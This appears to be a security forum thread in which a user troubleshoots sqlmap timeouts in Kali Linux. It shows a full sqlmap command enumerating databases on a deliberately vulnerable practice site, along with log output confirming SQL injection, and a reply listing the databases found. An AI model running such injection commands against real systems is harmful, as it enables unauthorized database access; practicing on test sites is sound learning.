1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SqlMap critical error

Discussion in 'Exploitation' started by Malisa, Apr 24, 2014.

  1. Malisa

    Malisa New Member

    Joined:
    Apr 24, 2014
    Messages:
    2
    Likes Received:
    0
    I'm having a problem with sqlmap in Kali Linux. I always get critical error
    : [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

    I tried to increase timeout time to 100, --flush-session, but nothing changed, always get same error many times for all vulnerable urls I tried. Do you know what is it?

    Here is one example:

    root@root:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 03:31:08

    [03:31:09] [INFO] testing connection to the target URL
    [03:31:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [03:31:13] [INFO] target URL is stable
    [03:31:13] [INFO] testing if GET parameter 'cat' is dynamic
    [03:31:17] [INFO] confirming that GET parameter 'cat' is dynamic
    [03:31:17] [INFO] GET parameter 'cat' is dynamic
    [03:31:17] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
    [03:31:17] [INFO] testing for SQL injection on GET parameter 'cat'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
    [03:31:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [03:31:33] [WARNING] reflective value(s) found and filtering out
    [03:31:34] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [03:31:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [03:31:35] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [03:31:35] [INFO] testing 'MySQL inline queries'
    [03:31:35] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [03:31:35] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
    [03:31:36] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
    [03:31:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [03:31:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [03:32:36] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [03:32:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [03:32:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
    [03:32:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [03:32:38] [INFO] target URL appears to have 11 columns in query
    [03:33:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
    [03:33:08] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [03:33:39] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
     
    #1
  2. jonagold

    jonagold New Member

    Joined:
    Dec 29, 2013
    Messages:
    22
    Likes Received:
    0
    works ok for me
    available databases [2]:
    [*] acuart
    [*] information_schem
     
    #2
  3. Malisa

    Malisa New Member

    Joined:
    Apr 24, 2014
    Messages:
    2
    Likes Received:
    0
    I did not solve this problem, but when I tried with live version of Kali Linux in virtual box, it worked just fine, I got databases like you did.
    But on installed version of Kali Linux and Web security Dojo always this error.:confused:
     
    #3
  4. rawstring

    rawstring Staff Member

    Joined:
    Apr 4, 2013
    Messages:
    362
    Likes Received:
    50
    Worked fine for me too
     
    #4

Share This Page